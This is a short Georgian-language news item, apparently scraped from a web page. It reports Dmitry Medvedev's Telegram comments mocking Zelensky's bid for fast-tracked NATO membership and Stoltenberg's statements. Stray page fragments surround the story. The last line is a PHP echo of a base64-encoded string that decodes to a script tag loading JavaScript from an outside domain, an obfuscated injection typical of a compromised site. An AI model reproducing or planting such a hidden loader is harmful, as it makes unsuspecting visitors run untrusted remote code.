celsiusi
ავერსი შნაიდერი
რუსეთის უშიშროების საბჭოს თავმჯდომარის მოადგილე დიმიტრი მედვედევი მიიჩნევს, რომ „უკრაინის ნატო-ში დაჩქარებულად გაწევრიანების მოთხოვნა, მესამე მსოფლიო ომის დაწყებას აჩქარებს“.
 
„ზელენსკის სურს, დაჩქარებულად შევიდეს ნატო-ში. შესანიშნავი იდეაა. უბრალოდ ეხვეწება ჩრდილოატლანტიკურ ალიანსს, დააჩქაროს მესამე მსოფლიო ომის დაწყება. ბიჭი აშკარად, გასულია“, – წერს მედვედევი „ტელეგრამზე“.
 
მედვედევი ასევე გამოეხმაურა, ნატო-ს გენერალური მდივნის, იენს სტოლტენბერგის განცხადებას, რომლის მიხედვითაც, უკრაინის სახელმწიფო გაქრება თუ უკრაინელები ბრძოლას შეწყვეტენ.
 
„რა ცინიკური ბიჭია. თუ ომი არ შეწყდება უკრაინელების დიდი ნაწილი გაქრება“, – აცხადებს მედვედევი.
 
ცნობისთვის, უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენკიმ, უკრაინის ნატო-ში დაჩქარებულად გაწევრიანებაზე განაცხადი შეტანის შესახებ დღეს განაცხადა.
525
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");